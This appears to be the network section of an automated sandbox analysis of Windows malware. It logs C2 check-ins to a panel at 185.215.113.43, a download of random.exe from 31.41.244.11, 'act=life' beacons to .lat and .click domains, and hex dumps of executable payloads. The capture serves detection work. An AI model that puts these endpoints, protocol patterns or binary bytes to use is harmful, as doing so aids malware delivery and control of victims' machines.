                                                                                                                                                                  Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                  Dec 18, 2024 11:09:25.083823919 CET224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                  Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                  Dec 18, 2024 11:09:25.083833933 CET1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                  Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                  Dec 18, 2024 11:09:25.083852053 CET1236INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                  Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
                                                                                                                                                                  Dec 18, 2024 11:09:25.083863974 CET1236INData Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34
                                                                                                                                                                  Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
                                                                                                                                                                  Dec 18, 2024 11:09:25.083986998 CET672INData Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50
                                                                                                                                                                  Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuW
                                                                                                                                                                  Dec 18, 2024 11:09:25.083998919 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                  Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                  Dec 18, 2024 11:09:25.084153891 CET1236INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                  Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
                                                                                                                                                                  Dec 18, 2024 11:09:25.084165096 CET1236INData Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44
                                                                                                                                                                  Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
                                                                                                                                                                  Dec 18, 2024 11:09:25.084176064 CET672INData Raw: 4d f4 e8 72 f8 ff ff f6 85 a4 fd ff ff 10 8b 7d f4 74 35 68 88 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 33 68 80 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 1d 57 e8 58 ff ff ff 59 eb 10 6a 00 57 ff d6 85 c0 74 4b 57
                                                                                                                                                                  Data Ascii: Mr}t5hAP$At3hAP$AtWXYjWtKWAt@PSAqSAjutuAtW_3@W_3Y_^[=lAt3@Vt$VAu3@^ujVAtVA^3^VY^
                                                                                                                                                                  Dec 18, 2024 11:09:25.203737020 CET1236INData Raw: ff 75 d0 ff 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9
                                                                                                                                                                  Data Ascii: uuhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.649940185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:34.521713972 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 36 38 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                  Data Ascii: d1=1016870001&unit=246122658369
                                                                                                                                                                  Dec 18, 2024 11:09:37.782728910 CET193INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:37 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.649953185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:39.530009985 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                  Dec 18, 2024 11:09:40.867819071 CET219INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:40 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 1 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  9192.168.2.649961185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:42.496467113 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                  Dec 18, 2024 11:09:43.841182947 CET299INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:43 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 36 38 37 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 6d <c>1016871001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  10192.168.2.64996631.41.244.11801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:43.965034962 CET62OUTGET /files/unique3/random.exe HTTP/1.1
                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.288681984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:45 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 1986048
                                                                                                                                                                  Last-Modified: Wed, 18 Dec 2024 08:56:38 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  ETag: "67628e46-1e4e00"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 b0 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|^K@Kx@Vjl <@.rsrclL@.idata T@ )V@hrqcmbfk1X@baxohzutK(@.taggant0K",@
                                                                                                                                                                  Dec 18, 2024 11:09:45.288820028 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:45.288899899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:45.288937092 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:45.288971901 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:45.289026976 CET672INData Raw: a2 a5 44 db aa 06 47 44 27 ee f4 e1 82 3c 96 2c 18 00 47 15 14 5f c2 e4 ac a9 d5 e1 98 40 10 45 4d b2 a6 b4 54 35 c5 e6 f2 26 18 41 36 c5 f5 7c dc 3e 0e f2 07 df 8a 44 78 55 71 82 22 4c f5 69 0f 8a c8 da 67 99 f7 10 6b 5d 76 7b 87 12 09 fa 65 ed
                                                                                                                                                                  Data Ascii: DGD'<,G_@EMT5&A6|>DxUq"Ligk]v{e996GFTd_BFuz`5h_x@Ft{+2*@[p@[68W?0U'S>}bzH_*i1Mw_Li!j-
                                                                                                                                                                  Dec 18, 2024 11:09:45.289061069 CET1236INData Raw: d6 0e 47 5a 20 66 17 ac e6 3d 11 7c 26 ef 08 53 84 7d ce 88 35 c7 e9 a5 57 42 01 eb 34 b7 f6 f4 f5 63 77 a5 f9 3c 0f 9d 0e 04 9d 9a db 13 7b 60 74 6f 1f df b6 0c 55 78 3d b8 f2 ec ab 16 a7 2a df fc 6e 9e 22 3a ae a4 a1 96 a6 7e b3 58 2e e4 fe 79
                                                                                                                                                                  Data Ascii: GZ f=|&S}5WB4cw<{`toUx=*n":~X.yRMz`1at:wrLiwpq;~JL|ZJBb?v.*c%/L*K`$O~\/E8}Sf@4 G9Qdpw~
                                                                                                                                                                  Dec 18, 2024 11:09:45.289096117 CET1236INData Raw: 28 fb f6 44 b9 63 13 f4 fb 2e 71 60 26 e4 84 10 d8 7e 96 cf 07 a3 e6 c9 77 28 31 0a 6b 4c 39 69 9f 81 0e da 5e c5 f7 0a 0f c0 17 dc 66 3e 88 7e 53 3a 6e 52 37 df e9 f5 26 42 6b 1c b5 82 f6 b9 27 63 f0 3a 11 d2 be 76 2e 04 ac a6 c2 95 7a 60 8d d1
                                                                                                                                                                  Data Ascii: (Dc.q`&~w(1kL9i^f>~S:nR7&Bk'c:v.z``mQ<lF(lmez`gWLt`+!]oj?9wa7@B)tgclrtB [Un\{<p>/@d+Ap<-'~]ZiE08
                                                                                                                                                                  Dec 18, 2024 11:09:45.289128065 CET448INData Raw: e6 bb 76 7b bf 04 09 51 3e 79 4c 88 6c db e9 b8 06 3f 90 43 3c 0c 47 10 95 5d 94 e4 fe 7d 86 72 e1 ff a4 3a 31 bf f6 a9 1d ef ee 36 30 c0 e9 d2 39 42 6b db 67 e2 f6 78 3c 63 64 9c f4 e2 81 ae 0c 74 49 57 d6 c7 ab 5d 6d 00 9e 8b de d3 4f 1a d3 4c
                                                                                                                                                                  Data Ascii: v{Q>yLl?C<G]}r:1609Bkgx<cdtIW]mOLi@bwf" {w46jh#<|N@Fah=).{`|/zZ;7Y1G\#`R{wWQT^Goj5pU7wl,ywLiPbBdLiQd
                                                                                                                                                                  Dec 18, 2024 11:09:45.289189100 CET1236INData Raw: 0e ce de 71 34 a1 8f a6 32 3c db 64 b8 01 47 40 8a cc 18 e5 fe 48 63 f7 93 04 6e 2f e6 f5 7a 60 e2 49 21 96 b6 f8 f8 30 8f b8 fe e4 8b 08 e9 18 b2 a9 15 15 83 3c a8 26 69 17 47 46 56 b5 72 e4 fe 00 99 d5 78 04 fb 8a 45 cf 7a 60 42 46 b8 72 b6 6c
                                                                                                                                                                  Data Ascii: q42<dG@Hcn/z`I!0<&iGFVrxEz`BFrlJ<xk6P<+F|$Jpr<z`=nb~,;<*BAFcfw8L;i\/N::@XpU+>#D8CM!7,1;6w?DCLiBr}8k
                                                                                                                                                                  Dec 18, 2024 11:09:45.409763098 CET1236INData Raw: d7 e7 7a 60 56 11 da 3f b7 40 0f a5 47 b8 fe e1 72 87 39 1f 19 f1 e4 c8 74 be 79 41 39 18 03 f6 8e e1 b7 b8 8c e6 a7 9e 61 ac 17 25 3b 0a 88 bd fa 97 69 70 7e 55 cd a7 5f c5 b2 e9 98 d9 0e 73 07 ad ce f0 77 4e 80 fe fa 4c ec 69 68 0d 33 d9 62 8d
                                                                                                                                                                  Data Ascii: z`V?@Gr9tyA9a%;ip~U_swNLih3bpy5p{UwStGw-#ZLi8ZY}@\/o8r{~\28$"5:@fS:30~\VkW9,wH8Ph


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  11192.168.2.649985185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:51.248774052 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 36 38 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                  Data Ascii: d1=1016871001&unit=246122658369
                                                                                                                                                                  Dec 18, 2024 11:09:52.583348989 CET193INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:52 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  12192.168.2.649994185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:54.324601889 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                  Dec 18, 2024 11:09:55.668965101 CET219INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:55 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 1 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  13192.168.2.650003185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:57.762070894 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                  Dec 18, 2024 11:09:59.105633974 CET196INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.649895172.67.179.109443340C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:18 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                  Host: grannyejh.lat
                                                                                                                                                                  2024-12-18 10:09:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                  2024-12-18 10:09:26 UTC1033INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:26 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=6lthhmid8mahsejfls528vkmbu; expires=Sun, 13-Apr-2025 03:55:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d980jGcmvk4lG7pKa4UDWLBa%2FqpL57pvAk36sohZFDQnZvzhcnp4UJHlcE8xJraVEXTcxwnolm9L%2BsBeP%2B%2Fqa7iPpTND4wmhYK%2BlAiApl6L7PXKgdzvEaNVThN5HNT8R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5b4e3b365e72-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=2124&rtt_var=812&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1335773&cwnd=193&unsent_bytes=0&cid=ffe1ba65882f7cb4&ts=7574&x=0"
                                                                                                                                                                  2024-12-18 10:09:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                  2024-12-18 10:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.649913104.21.23.764434196C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:24 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                  2024-12-18 10:09:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                  Data Ascii: act=life
